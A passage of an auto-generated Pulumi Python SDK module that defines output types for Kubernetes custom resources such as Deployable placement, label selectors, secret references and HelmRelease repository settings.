                 values: Optional[Sequence[str]] = None):
        """
        A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
        :param str key: key is the label key that the selector applies to.
        :param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
        :param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
        """
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "operator", operator)
        if values is not None:
            pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def key(self) -> str:
        """
        key is the label key that the selector applies to.
        """
        return pulumi.get(self, "key")

    @property
    @pulumi.getter
    def operator(self) -> str:
        """
        operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
        """
        return pulumi.get(self, "operator")

    @property
    @pulumi.getter
    def values(self) -> Optional[Sequence[str]]:
        """
        values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
        """
        return pulumi.get(self, "values")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
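The `In`/`NotIn`/`Exists`/`DoesNotExist` operators documented above follow the standard Kubernetes label-selector semantics, with all requirements in a selector ANDed together. A plain-Python sketch of those semantics, independent of the generated Pulumi types (function names are illustrative):

```python
def requirement_matches(labels, key, operator, values=()):
    # One label-selector requirement, per the Kubernetes semantics
    # described in the docstrings above.
    if operator == "In":
        return key in labels and labels[key] in values
    if operator == "NotIn":
        return key not in labels or labels[key] not in values
    if operator == "Exists":
        return key in labels
    if operator == "DoesNotExist":
        return key not in labels
    raise ValueError("unknown operator: %s" % operator)

def selector_matches(labels, requirements):
    # matchExpressions requirements are ANDed, as the docstrings state.
    return all(requirement_matches(labels, *req) for req in requirements)
```

A `matchLabels` entry `{"env": "prod"}` is equivalent to the requirement `("env", "In", ["prod"])` under this model.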
@pulumi.output_type
class ChannelSpecSecretRef(dict):
    """
    For a `github` channel or a `helmrepo` channel on github, this can be used to reference a Secret which contains the credentials for authentication, i.e. `user` and `accessToken`. For an `objectbucket` channel, this can be used to reference a Secret which contains the AWS credentials, i.e. `AccessKeyID` and `SecretAccessKey`.
    """
    def __init__(__self__, *,
                 api_version: Optional[str] = None,
                 field_path: Optional[str] = None,
                 kind: Optional[str] = None,
                 name: Optional[str] = None,
                 namespace: Optional[str] = None,
                 resource_version: Optional[str] = None,
                 uid: Optional[str] = None):
        """
        For a `github` channel or a `helmrepo` channel on github, this can be used to reference a Secret which contains the credentials for authentication, i.e. `user` and `accessToken`. For an `objectbucket` channel, this can be used to reference a Secret which contains the AWS credentials, i.e. `AccessKeyID` and `SecretAccessKey`.
        :param str api_version: API version of the referent.
        :param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        :param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
        :param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        :param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        :param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
        :param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        if api_version is not None:
            pulumi.set(__self__, "api_version", api_version)
        if field_path is not None:
            pulumi.set(__self__, "field_path", field_path)
        if kind is not None:
            pulumi.set(__self__, "kind", kind)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if resource_version is not None:
            pulumi.set(__self__, "resource_version", resource_version)
        if uid is not None:
            pulumi.set(__self__, "uid", uid)

    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[str]:
        """
        API version of the referent.
        """
        return pulumi.get(self, "api_version")

    @property
    @pulumi.getter(name="fieldPath")
    def field_path(self) -> Optional[str]:
        """
        If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        """
        return pulumi.get(self, "field_path")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """
        Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
        """
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """
        Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def namespace(self) -> Optional[str]:
        """
        Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        """
        return pulumi.get(self, "namespace")

    @property
    @pulumi.getter(name="resourceVersion")
    def resource_version(self) -> Optional[str]:
        """
        Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
        """
        return pulumi.get(self, "resource_version")

    @property
    @pulumi.getter
    def uid(self) -> Optional[str]:
        """
        UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        return pulumi.get(self, "uid")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

@pulumi.output_type
class DeployableSpec(dict):
    """
    DeployableSpec defines the desired state of Deployable
    """
    def __init__(__self__, *,
                 template: Mapping[str, Any],
                 channels: Optional[Sequence[str]] = None,
                 dependencies: Optional[Sequence['outputs.DeployableSpecDependencies']] = None,
                 overrides: Optional[Sequence['outputs.DeployableSpecOverrides']] = None,
                 placement: Optional['outputs.DeployableSpecPlacement'] = None):
        """
        DeployableSpec defines the desired state of Deployable
        :param 'DeployableSpecPlacementArgs' placement: Placement field to be referenced in specs, align with Fedv2, add placementref
        """
        pulumi.set(__self__, "template", template)
        if channels is not None:
            pulumi.set(__self__, "channels", channels)
        if dependencies is not None:
            pulumi.set(__self__, "dependencies", dependencies)
        if overrides is not None:
            pulumi.set(__self__, "overrides", overrides)
        if placement is not None:
            pulumi.set(__self__, "placement", placement)

    @property
    @pulumi.getter
    def template(self) -> Mapping[str, Any]:
        return pulumi.get(self, "template")

    @property
    @pulumi.getter
    def channels(self) -> Optional[Sequence[str]]:
        return pulumi.get(self, "channels")

    @property
    @pulumi.getter
    def dependencies(self) -> Optional[Sequence['outputs.DeployableSpecDependencies']]:
        return pulumi.get(self, "dependencies")

    @property
    @pulumi.getter
    def overrides(self) -> Optional[Sequence['outputs.DeployableSpecOverrides']]:
        return pulumi.get(self, "overrides")

    @property
    @pulumi.getter
    def placement(self) -> Optional['outputs.DeployableSpecPlacement']:
        """
        Placement field to be referenced in specs, align with Fedv2, add placementref
        """
        return pulumi.get(self, "placement")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop


@pulumi.output_type
class DeployableSpecDependencies(dict):
    """
    Dependency of Deployable. The Properties field is the flexibility for different Kind
    """
    def __init__(__self__, *,
                 annotations: Optional[Mapping[str, str]] = None,
                 api_version: Optional[str] = None,
                 field_path: Optional[str] = None,
                 kind: Optional[str] = None,
                 labels: Optional[Mapping[str, str]] = None,
                 name: Optional[str] = None,
                 namespace: Optional[str] = None,
                 resource_version: Optional[str] = None,
                 uid: Optional[str] = None):
        """
        Dependency of Deployable. The Properties field is the flexibility for different Kind
        :param str api_version: API version of the referent.
        :param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        :param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
        :param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        :param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        :param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        :param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if api_version is not None:
            pulumi.set(__self__, "api_version", api_version)
        if field_path is not None:
            pulumi.set(__self__, "field_path", field_path)
        if kind is not None:
            pulumi.set(__self__, "kind", kind)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if resource_version is not None:
            pulumi.set(__self__, "resource_version", resource_version)
        if uid is not None:
            pulumi.set(__self__, "uid", uid)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[Mapping[str, str]]:
        return pulumi.get(self, "annotations")

    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[str]:
        """
        API version of the referent.
        """
        return pulumi.get(self, "api_version")

    @property
    @pulumi.getter(name="fieldPath")
    def field_path(self) -> Optional[str]:
        """
        If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        """
        return pulumi.get(self, "field_path")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """
        Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
        """
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def labels(self) -> Optional[Mapping[str, str]]:
        return pulumi.get(self, "labels")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """
        Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def namespace(self) -> Optional[str]:
        """
        Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        """
        return pulumi.get(self, "namespace")

    @property
    @pulumi.getter(name="resourceVersion")
    def resource_version(self) -> Optional[str]:
        """
        Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        """
        return pulumi.get(self, "resource_version")

    @property
    @pulumi.getter
    def uid(self) -> Optional[str]:
        """
        UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        return pulumi.get(self, "uid")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

@pulumi.output_type
class DeployableSpecOverrides(dict):
    """
    Overrides field in deployable
    """
    def __init__(__self__, *,
                 cluster_name: str,
                 cluster_overrides: Sequence[Mapping[str, Any]]):
        """
        Overrides field in deployable
        """
        pulumi.set(__self__, "cluster_name", cluster_name)
        pulumi.set(__self__, "cluster_overrides", cluster_overrides)

    @property
    @pulumi.getter(name="clusterName")
    def cluster_name(self) -> str:
        return pulumi.get(self, "cluster_name")

    @property
    @pulumi.getter(name="clusterOverrides")
    def cluster_overrides(self) -> Sequence[Mapping[str, Any]]:
        return pulumi.get(self, "cluster_overrides")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop


@pulumi.output_type
class DeployableSpecPlacement(dict):
    """
    Placement field to be referenced in specs, align with Fedv2, add placementref
    """
    def __init__(__self__, *,
                 cluster_selector: Optional['outputs.DeployableSpecPlacementClusterSelector'] = None,
                 clusters: Optional[Sequence['outputs.DeployableSpecPlacementClusters']] = None,
                 local: Optional[bool] = None,
                 placement_ref: Optional['outputs.DeployableSpecPlacementPlacementRef'] = None):
        """
        Placement field to be referenced in specs, align with Fedv2, add placementref
        :param 'DeployableSpecPlacementClusterSelectorArgs' cluster_selector: A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
        :param 'DeployableSpecPlacementPlacementRefArgs' placement_ref: ObjectReference contains enough information to let you inspect or modify the referred object.
        """
        if cluster_selector is not None:
            pulumi.set(__self__, "cluster_selector", cluster_selector)
        if clusters is not None:
            pulumi.set(__self__, "clusters", clusters)
        if local is not None:
            pulumi.set(__self__, "local", local)
        if placement_ref is not None:
            pulumi.set(__self__, "placement_ref", placement_ref)

    @property
    @pulumi.getter(name="clusterSelector")
    def cluster_selector(self) -> Optional['outputs.DeployableSpecPlacementClusterSelector']:
        """
        A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
        """
        return pulumi.get(self, "cluster_selector")

    @property
    @pulumi.getter
    def clusters(self) -> Optional[Sequence['outputs.DeployableSpecPlacementClusters']]:
        return pulumi.get(self, "clusters")

    @property
    @pulumi.getter
    def local(self) -> Optional[bool]:
        return pulumi.get(self, "local")

    @property
    @pulumi.getter(name="placementRef")
    def placement_ref(self) -> Optional['outputs.DeployableSpecPlacementPlacementRef']:
        """
        ObjectReference contains enough information to let you inspect or modify the referred object.
        """
        return pulumi.get(self, "placement_ref")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

@pulumi.output_type
class DeployableSpecPlacementClusterSelector(dict):
    """
    A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
    """
    def __init__(__self__, *,
                 match_expressions: Optional[Sequence['outputs.DeployableSpecPlacementClusterSelectorMatchExpressions']] = None,
                 match_labels: Optional[Mapping[str, str]] = None):
        """
        A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
        :param Sequence['DeployableSpecPlacementClusterSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
        :param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
        """
        if match_expressions is not None:
            pulumi.set(__self__, "match_expressions", match_expressions)
        if match_labels is not None:
            pulumi.set(__self__, "match_labels", match_labels)

    @property
    @pulumi.getter(name="matchExpressions")
    def match_expressions(self) -> Optional[Sequence['outputs.DeployableSpecPlacementClusterSelectorMatchExpressions']]:
        """
        matchExpressions is a list of label selector requirements. The requirements are ANDed.
        """
        return pulumi.get(self, "match_expressions")

    @property
    @pulumi.getter(name="matchLabels")
    def match_labels(self) -> Optional[Mapping[str, str]]:
        """
        matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
        """
        return pulumi.get(self, "match_labels")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

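The matchLabels docstring above states an equivalence: each `{key: value}` pair behaves exactly like a matchExpressions requirement with operator `In` and a single value. A minimal sketch of that conversion (the helper name `match_labels_to_expressions` is illustrative, not part of the generated SDK):

```python
from typing import Mapping, Sequence


def match_labels_to_expressions(match_labels: Mapping[str, str]) -> Sequence[dict]:
    # Each {key: value} pair becomes one requirement:
    # key == "key", operator == "In", values == ["value"].
    # The resulting requirements are ANDed, just like matchLabels itself.
    return [
        {"key": k, "operator": "In", "values": [v]}
        for k, v in match_labels.items()
    ]
```

This is why an empty selector (no matchLabels, no matchExpressions) matches everything: it produces zero requirements, and an empty conjunction is vacuously true.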
@pulumi.output_type
class DeployableSpecPlacementClusterSelectorMatchExpressions(dict):
    """
    A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
    """
    def __init__(__self__, *,
                 key: str,
                 operator: str,
                 values: Optional[Sequence[str]] = None):
        """
        A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
        :param str key: key is the label key that the selector applies to.
        :param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
        :param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
        """
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "operator", operator)
        if values is not None:
            pulumi.set(__self__, "values", values)

    @property
    @pulumi.getter
    def key(self) -> str:
        """
        key is the label key that the selector applies to.
        """
        return pulumi.get(self, "key")

    @property
    @pulumi.getter
    def operator(self) -> str:
        """
        operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
        """
        return pulumi.get(self, "operator")

    @property
    @pulumi.getter
    def values(self) -> Optional[Sequence[str]]:
        """
        values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
        """
        return pulumi.get(self, "values")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

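A sketch of how a single requirement like the one above is evaluated against a label map, following the Kubernetes label-selector operator semantics described in the docstrings (In, NotIn, Exists, DoesNotExist). The helper name `matches` is illustrative and not part of the generated SDK; note in particular that NotIn and DoesNotExist also match objects that lack the key entirely:

```python
from typing import Mapping, Optional, Sequence


def matches(labels: Mapping[str, str], key: str, operator: str,
            values: Optional[Sequence[str]] = None) -> bool:
    # In: key must be present and its value must be one of `values`.
    if operator == "In":
        return key in labels and labels[key] in (values or [])
    # NotIn: key absent, or present with a value outside `values`.
    if operator == "NotIn":
        return key not in labels or labels[key] not in (values or [])
    # Exists / DoesNotExist ignore `values` (which must be empty).
    if operator == "Exists":
        return key in labels
    if operator == "DoesNotExist":
        return key not in labels
    raise ValueError(f"unknown operator: {operator}")
```

A full matchExpressions list would then AND these per-requirement results, consistent with "The requirements are ANDed" above.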
@pulumi.output_type
class DeployableSpecPlacementClusters(dict):
    """
    GenericClusterReference - in alignment with kubefed
    """
    def __init__(__self__, *,
                 name: str):
        """
        GenericClusterReference - in alignment with kubefed
        """
        pulumi.set(__self__, "name", name)

    @property
    @pulumi.getter
    def name(self) -> str:
        return pulumi.get(self, "name")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop


@pulumi.output_type
class DeployableSpecPlacementPlacementRef(dict):
    """
    ObjectReference contains enough information to let you inspect or modify the referred object.
    """
    def __init__(__self__, *,
                 api_version: Optional[str] = None,
                 field_path: Optional[str] = None,
                 kind: Optional[str] = None,
                 name: Optional[str] = None,
                 namespace: Optional[str] = None,
                 resource_version: Optional[str] = None,
                 uid: Optional[str] = None):
        """
        ObjectReference contains enough information to let you inspect or modify the referred object.
        :param str api_version: API version of the referent.
        :param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        :param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
        :param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        :param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        :param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        :param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        if api_version is not None:
            pulumi.set(__self__, "api_version", api_version)
        if field_path is not None:
            pulumi.set(__self__, "field_path", field_path)
        if kind is not None:
            pulumi.set(__self__, "kind", kind)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if resource_version is not None:
            pulumi.set(__self__, "resource_version", resource_version)
        if uid is not None:
            pulumi.set(__self__, "uid", uid)

    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[str]:
        """
        API version of the referent.
        """
        return pulumi.get(self, "api_version")

    @property
    @pulumi.getter(name="fieldPath")
    def field_path(self) -> Optional[str]:
        """
        If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        """
        return pulumi.get(self, "field_path")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """
        Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
        """
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """
        Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def namespace(self) -> Optional[str]:
        """
        Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        """
        return pulumi.get(self, "namespace")

    @property
    @pulumi.getter(name="resourceVersion")
    def resource_version(self) -> Optional[str]:
        """
        Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        """
        return pulumi.get(self, "resource_version")

    @property
    @pulumi.getter
    def uid(self) -> Optional[str]:
        """
        UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        return pulumi.get(self, "uid")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

@pulumi.output_type
class DeployableStatus(dict):
    """
    DeployableStatus defines the observed state of Deployable
    """
    def __init__(__self__, *,
                 target_clusters: Optional[Any] = None):
        """
        DeployableStatus defines the observed state of Deployable
        """
        if target_clusters is not None:
            pulumi.set(__self__, "target_clusters", target_clusters)

    @property
    @pulumi.getter(name="targetClusters")
    def target_clusters(self) -> Optional[Any]:
        return pulumi.get(self, "target_clusters")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop


@pulumi.output_type
class HelmReleaseRepo(dict):
    """
    HelmReleaseRepo defines the repository of HelmRelease
    """
    def __init__(__self__, *,
                 chart_name: Optional[str] = None,
                 config_map_ref: Optional['outputs.HelmReleaseRepoConfigMapRef'] = None,
                 insecure_skip_verify: Optional[bool] = None,
                 secret_ref: Optional['outputs.HelmReleaseRepoSecretRef'] = None,
                 source: Optional['outputs.HelmReleaseRepoSource'] = None,
                 version: Optional[str] = None):
        """
        HelmReleaseRepo defines the repository of HelmRelease
        :param str chart_name: ChartName is the name of the chart within the repo
        :param 'HelmReleaseRepoConfigMapRefArgs' config_map_ref: Configuration parameters to access the helm-repo defined in the CatalogSource
        :param bool insecure_skip_verify: Used to skip repo server's TLS certificate verification
        :param 'HelmReleaseRepoSecretRefArgs' secret_ref: Secret to use to access the helm-repo defined in the CatalogSource.
        :param 'HelmReleaseRepoSourceArgs' source: INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html Source holds the url toward the helm-chart
        :param str version: Version is the chart version
        """
        if chart_name is not None:
            pulumi.set(__self__, "chart_name", chart_name)
        if config_map_ref is not None:
            pulumi.set(__self__, "config_map_ref", config_map_ref)
        if insecure_skip_verify is not None:
            pulumi.set(__self__, "insecure_skip_verify", insecure_skip_verify)
        if secret_ref is not None:
            pulumi.set(__self__, "secret_ref", secret_ref)
        if source is not None:
            pulumi.set(__self__, "source", source)
        if version is not None:
            pulumi.set(__self__, "version", version)

    @property
    @pulumi.getter(name="chartName")
    def chart_name(self) -> Optional[str]:
        """
        ChartName is the name of the chart within the repo
        """
        return pulumi.get(self, "chart_name")

    @property
    @pulumi.getter(name="configMapRef")
    def config_map_ref(self) -> Optional['outputs.HelmReleaseRepoConfigMapRef']:
        """
        Configuration parameters to access the helm-repo defined in the CatalogSource
        """
        return pulumi.get(self, "config_map_ref")

    @property
    @pulumi.getter(name="insecureSkipVerify")
    def insecure_skip_verify(self) -> Optional[bool]:
        """
        Used to skip repo server's TLS certificate verification
        """
        return pulumi.get(self, "insecure_skip_verify")

    @property
    @pulumi.getter(name="secretRef")
    def secret_ref(self) -> Optional['outputs.HelmReleaseRepoSecretRef']:
        """
        Secret to use to access the helm-repo defined in the CatalogSource.
        """
        return pulumi.get(self, "secret_ref")

    @property
    @pulumi.getter
    def source(self) -> Optional['outputs.HelmReleaseRepoSource']:
        """
        INSERT ADDITIONAL SPEC FIELDS - desired state of cluster Important: Run "operator-sdk generate k8s" to regenerate code after modifying this file Add custom validation using kubebuilder tags: https://book-v1.book.kubebuilder.io/beyond_basics/generating_crd.html Source holds the url toward the helm-chart
        """
        return pulumi.get(self, "source")

    @property
    @pulumi.getter
    def version(self) -> Optional[str]:
        """
        Version is the chart version
        """
        return pulumi.get(self, "version")

    def _translate_property(self, prop):
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

@pulumi.output_type
class HelmReleaseRepoConfigMapRef(dict):
    """
    Configuration parameters to access the helm-repo defined in the CatalogSource
    """
    def __init__(__self__, *,
                 api_version: Optional[str] = None,
                 field_path: Optional[str] = None,
                 kind: Optional[str] = None,
                 name: Optional[str] = None,
                 namespace: Optional[str] = None,
                 resource_version: Optional[str] = None,
                 uid: Optional[str] = None):
        """
        Configuration parameters to access the helm-repo defined in the CatalogSource
        :param str api_version: API version of the referent.
        :param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        :param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
        :param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        :param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        :param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        :param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
        """
        if api_version is not None:
            pulumi.set(__self__, "api_version", api_version)
        if field_path is not None:
            pulumi.set(__self__, "field_path", field_path)
        if kind is not None:
            pulumi.set(__self__, "kind", kind)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if resource_version is not None:
            pulumi.set(__self__, "resource_version", resource_version)
        if uid is not None:
            pulumi.set(__self__, "uid", uid)

    @property
    @pulumi.getter(name="apiVersion")
    def api_version(self) -> Optional[str]:
        """
        API version of the referent.
        """
        return pulumi.get(self, "api_version")

    @property
    @pulumi.getter(name="fieldPath")
    def field_path(self) -> Optional[str]:
        """
        If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
        """
        return pulumi.get(self, "field_path")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """
        Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
        """
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def name(self) -> Optional[str]:
        """
        Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def namespace(self) -> Optional[str]:
        """
        Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
        """
        return pulumi.get(self, "namespace")

    @property
    @pulumi.getter(name="resourceVersion")
    def resource_version(self) -> Optional[str]:
        """
        Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        """
